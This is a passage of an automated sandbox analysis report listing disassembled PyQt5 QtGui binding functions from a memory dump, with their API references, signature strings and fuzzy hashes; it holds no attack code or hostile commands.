_Py_Dealloc.PYTHON3 ref: 00007FFB9A30FDEB
_Py_Dealloc.PYTHON3 ref: 00007FFB9A30FDFD
_Py_Dealloc.PYTHON3 ref: 00007FFB9A30FE25
_Py_Dealloc.PYTHON3 ref: 00007FFB9A30FE33

Strings

the first element has type '%s' but 'QOpenGLTexture.Filter' is expected, xrefs: 00007FFB9A30FD73
the second element has type '%s' but 'QOpenGLTexture.Filter' is expected, xrefs: 00007FFB9A30FDD0
sequence has %zd elements but 2 elements are expected, xrefs: 00007FFB9A30FCEF

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: DeallocErr_Sequence_$FormatItemOccurred$CheckFlagsSizeType_
String ID: sequence has %zd elements but 2 elements are expected$the first element has type '%s' but 'QOpenGLTexture.Filter' is expected$the second element has type '%s' but 'QOpenGLTexture.Filter' is expected
API String ID: 4278930742-3526451457
Opcode ID: 1070a1e1994d7eb63a28cfeef263ea19db83fcf846fcb55bb2bbfa17b81df9b0
Instruction ID: 0a5eb730610baee906304ef3939a6ab98111ee22d5a60eb5641c5f48713022ba
Opcode Fuzzy Hash: 1070a1e1994d7eb63a28cfeef263ea19db83fcf846fcb55bb2bbfa17b81df9b0
Instruction Fuzzy Hash: AB514EA5A09B6282FB759B76E8541793368BF86FA4F1440B5CE0E637A0DF7CE485D300

Function 00007FFB9A305920 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?insertImage@QTextCursor@@QEAAXAEBVQTextImageFormat@@@Z.QT5GUI ref: 00007FFB9A3059A5
?insertImage@QTextCursor@@QEAAXAEBVQTextImageFormat@@W4Position@QTextFrameFormat@@@Z.QT5GUI ref: 00007FFB9A305A44
?insertImage@QTextCursor@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FFB9A305AC5
??0?$QVector@VQPoint@@@@QEAA@XZ.QT5CORE ref: 00007FFB9A305AF0
?insertImage@QTextCursor@@QEAAXAEBVQImage@@AEBVQString@@@Z.QT5GUI ref: 00007FFB9A305B91
??1QString@@QEAA@XZ.QT5CORE ref: 00007FFB9A305BC8

Strings

insertImage(self, format: QTextImageFormat)insertImage(self, format: QTextImageFormat, alignment: QTextFrameFormat.Position)insertImage(self, name: Optional[str])insertImage(self, image: QImage, name: Optional[str] = ''), xrefs: 00007FFB9A305BE4
BJ9, xrefs: 00007FFB9A30597B
BJ9|J1, xrefs: 00007FFB9A305B63
BJ9E, xrefs: 00007FFB9A305A16
BJ1, xrefs: 00007FFB9A305A9B
QTextCursor, xrefs: 00007FFB9A305BF6
insertImage, xrefs: 00007FFB9A305BEF

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?insertCursor@@Image@$Format@@@ImageString@@@$??0?$Format@@FrameImage@@Point@@@@Position@String@@Vector@
String ID: BJ1$BJ9$BJ9E$BJ9|J1$QTextCursor$insertImage$insertImage(self, format: QTextImageFormat)insertImage(self, format: QTextImageFormat, alignment: QTextFrameFormat.Position)insertImage(self, name: Optional[str])insertImage(self, image: QImage, name: Optional[str] = '')
API String ID: 1837126645-292677817
Opcode ID: 5c1adad5432a419a0e87fc9a608ee3c8ecb9d2ff4636203f429608fe4ea8dc73
Instruction ID: 53a6404c24612451151f8503c56658b79d021ef4369f860c99067d66ea8100a2
Opcode Fuzzy Hash: 5c1adad5432a419a0e87fc9a608ee3c8ecb9d2ff4636203f429608fe4ea8dc73
Instruction Fuzzy Hash: 1491F776609F46C9EB60CF25E8801A977B8FB49B88F514276EE8D43B28DF38E554C700

Function 00007FFB9A2DDBE0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?setPoints@QPolygon@@QEAAXHPEBH@Z.QT5GUI ref: 00007FFB9A2DDC68
PyTuple_Size.PYTHON3 ref: 00007FFB9A2DDCF7
PyTuple_Size.PYTHON3 ref: 00007FFB9A2DDD3B
PyTuple_GetItem.PYTHON3 ref: 00007FFB9A2DDD57
PyLong_AsLong.PYTHON3 ref: 00007FFB9A2DDD60
PyTuple_Size.PYTHON3 ref: 00007FFB9A2DDD73
?setPoints@QPolygon@@QEAAXHPEBH@Z.QT5GUI ref: 00007FFB9A2DDD88
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2DDDAE

Part of subcall function 00007FFB9A367940: PyList_Size.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A367955
Part of subcall function 00007FFB9A367940: PyList_Size.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A36797F
Part of subcall function 00007FFB9A367940: PyList_Size.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A36798F
Part of subcall function 00007FFB9A367940: PyList_GetItem.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A3679A6
Part of subcall function 00007FFB9A367940: PyLong_AsLong.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A3679AF
Part of subcall function 00007FFB9A367940: PyErr_Occurred.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A3679B8
Part of subcall function 00007FFB9A367940: PyList_Size.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A3679C9

Strings

setPoints(self, points: List[int])setPoints(self, firstx: int, firsty: int, *args: int), xrefs: 00007FFB9A2DDDC0
QPolygon, xrefs: 00007FFB9A2DDDD2
setPoints, xrefs: 00007FFB9A2DDDCB
BiiW, xrefs: 00007FFB9A2DDCAB

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Size$List_$Tuple_$?setItemLongLong_Points@Polygon@@$DeallocErr_Occurred
String ID: BiiW$QPolygon$setPoints$setPoints(self, points: List[int])setPoints(self, firstx: int, firsty: int, *args: int)
API String ID: 1457764276-50150461
Opcode ID: 5bf819108298e5f4b65e7aa6009699c39a23a226b2e514b0e37f9f49d95420ee
Instruction ID: 1dd2d148f56fd266bbd4446156a82a65e5893e354777df4114f34d030c74071c
Opcode Fuzzy Hash: 5bf819108298e5f4b65e7aa6009699c39a23a226b2e514b0e37f9f49d95420ee
Instruction Fuzzy Hash: 54514072A19B5689EB60DF71E8406A837B8FB89B98F444176EE4E53764DF3CD049C700

Function 00007FFB9A315F10 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PySequence_Check.PYTHON3 ref: 00007FFB9A315F36
PyType_GetFlags.PYTHON3 ref: 00007FFB9A315F44
PySequence_Size.PYTHON3 ref: 00007FFB9A315F7A
PySequence_GetItem.PYTHON3 ref: 00007FFB9A315FF6
PyErr_Occurred.PYTHON3 ref: 00007FFB9A316026
?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFB9A31606A

Strings

element %zd has type '%s' but 'QFontDatabase.WritingSystem' is expected, xrefs: 00007FFB9A316210

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Sequence_$?detach_grow@CheckData@1@Data@@Err_FlagsItemListOccurredSizeType_
String ID: element %zd has type '%s' but 'QFontDatabase.WritingSystem' is expected
API String ID: 3772155008-1695380754
Opcode ID: 1148263e027fde29fbc7795b4cbce87eadaa7c1c7006bc26e05b6af7d4fc637e
Instruction ID: 24ece0d4e9f4e8d24cea24df8c3943e820f5f7bcbecd2c2d382a28ca41079b30
Opcode Fuzzy Hash: 1148263e027fde29fbc7795b4cbce87eadaa7c1c7006bc26e05b6af7d4fc637e
Instruction Fuzzy Hash: 4CA19CB2A09B8286EB60CF25E44036D7BA8FB89B94F58813ADE8E57754CF3CD455C700

Function 00007FFB9A345B50 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?contains@QPainterPath@@QEBA_NAEBVQPointF@@@Z.QT5GUI ref: 00007FFB9A345BC5
PyBool_FromLong.PYTHON3 ref: 00007FFB9A345BED
?contains@QPainterPath@@QEBA_NAEBVQRectF@@@Z.QT5GUI ref: 00007FFB9A345C53
PyBool_FromLong.PYTHON3 ref: 00007FFB9A345C5C

Strings

BJ9, xrefs: 00007FFB9A345C15, 00007FFB9A345C8D
QPainterPath, xrefs: 00007FFB9A345CEE
contains(self, pt: Union[QPointF, QPoint]) -> boolcontains(self, rect: QRectF) -> boolcontains(self, p: QPainterPath) -> bool, xrefs: 00007FFB9A345CDC
BJ1, xrefs: 00007FFB9A345B6D
contains, xrefs: 00007FFB9A345CE7

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?contains@Bool_F@@@FromLongPainterPath@@$PointRect
String ID: BJ1$BJ9$QPainterPath$contains$contains(self, pt: Union[QPointF, QPoint]) -> boolcontains(self, rect: QRectF) -> boolcontains(self, p: QPainterPath) -> bool
API String ID: 4104991098-2786663850
Opcode ID: bff1b2ebbd895d98924435a103a4323318d803a81499cab347a24f1b90d8876e
Instruction ID: 403fc15b29b5eee1c4aae243e1c331973bf6ac3205739b58b66cc8cac973d5ef
Opcode Fuzzy Hash: bff1b2ebbd895d98924435a103a4323318d803a81499cab347a24f1b90d8876e
Instruction Fuzzy Hash: 9D5118B6A08F4599EB608F71E8840E937B8FB48B98B544576DE8D43768DF3CD198C710

Function 00007FFB9A3619F0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??0?$QVector@VQPoint@@@@QEAA@XZ.QT5CORE ref: 00007FFB9A361A6A
?begin@?$QVector@VQPoint@@@@QEBAPEBVQPoint@@XZ.QT5CORE ref: 00007FFB9A361A8E
?receivers@QObject@@IEBAHPEBD@Z.QT5CORE ref: 00007FFB9A361A9C
PyLong_FromLong.PYTHON3 ref: 00007FFB9A361ACA
??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFB9A361AD8
??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFB9A361B00

Strings

receivers(self, signal: PYQT_SIGNAL) -> int, xrefs: 00007FFB9A361B0D
BP0, xrefs: 00007FFB9A361A16
receivers, xrefs: 00007FFB9A361B19
QTextList, xrefs: 00007FFB9A361B20
pyqt5_get_signal_signature, xrefs: 00007FFB9A361A51

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Array@@BytePoint@@@@Vector@$??0?$?begin@?$?receivers@FromLongLong_Object@@Point@@
String ID: BP0$QTextList$pyqt5_get_signal_signature$receivers$receivers(self, signal: PYQT_SIGNAL) -> int
API String ID: 842024227-2161664726
Opcode ID: 62e87c71fcdf17e0a174dca32a9e45d95a5d82fbba875d599316169cc519c955
Instruction ID: 5a75b3451cb093d4d072ca498ad671e86f6cfdd8ad62602bcd71153ea8f324f8
Opcode Fuzzy Hash: 62e87c71fcdf17e0a174dca32a9e45d95a5d82fbba875d599316169cc519c955
Instruction Fuzzy Hash: 84310AB5A1CA46C2EB208F35E8890B933A9FB95B85F6041B6CA4D43370DF3CD949C700

Function 00007FFB9A323B10 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A323B56
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A323B67
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A323B78
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A323B89
PyUnicode_FromFormat.PYTHON3 ref: 00007FFB9A323BBB
_Py_Dealloc.PYTHON3 ref: 00007FFB9A323BCE
_Py_Dealloc.PYTHON3 ref: 00007FFB9A323BE7
_Py_Dealloc.PYTHON3 ref: 00007FFB9A323C00
_Py_Dealloc.PYTHON3 ref: 00007FFB9A323C19

Strings

PyQt5.QtGui.QVector4D(%R, %R, %R, %R), xrefs: 00007FFB9A323BB1

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: From$DeallocDoubleFloat_$FormatUnicode_
String ID: PyQt5.QtGui.QVector4D(%R, %R, %R, %R)
API String ID: 3465742751-4060293262
Opcode ID: e04101e1c1e824ba33082aafffd6755d9bd09ff449eeb7073204de4622d2a1d5
Instruction ID: a4ee7557d779b2df82480f33c66735f47bee4d49ff9c8d472faed67e685be04e
Opcode Fuzzy Hash: e04101e1c1e824ba33082aafffd6755d9bd09ff449eeb7073204de4622d2a1d5
Instruction Fuzzy Hash: D93184B1A0DB6686EB758F31E514128B3A8AF46FA1F084174CE4D27B54EF3CE4859700

Function 00007FFB9A327C40 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?distanceToPlane@QVector3D@@QEBAMAEBV1@0@Z.QT5GUI ref: 00007FFB9A327CB7
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A327CC1
?distanceToPlane@QVector3D@@QEBAMAEBV1@00@Z.QT5GUI ref: 00007FFB9A327D58
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A327D62

Strings

BJ9J9, xrefs: 00007FFB9A327C72
distanceToPlane, xrefs: 00007FFB9A327D87
distanceToPlane(self, plane: QVector3D, normal: QVector3D) -> floatdistanceToPlane(self, plane1: QVector3D, plane2: QVector3D, plane3: QVector3D) -> float, xrefs: 00007FFB9A327D78
BJ9J9J9, xrefs: 00007FFB9A327CF9
QVector3D, xrefs: 00007FFB9A327D8E

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
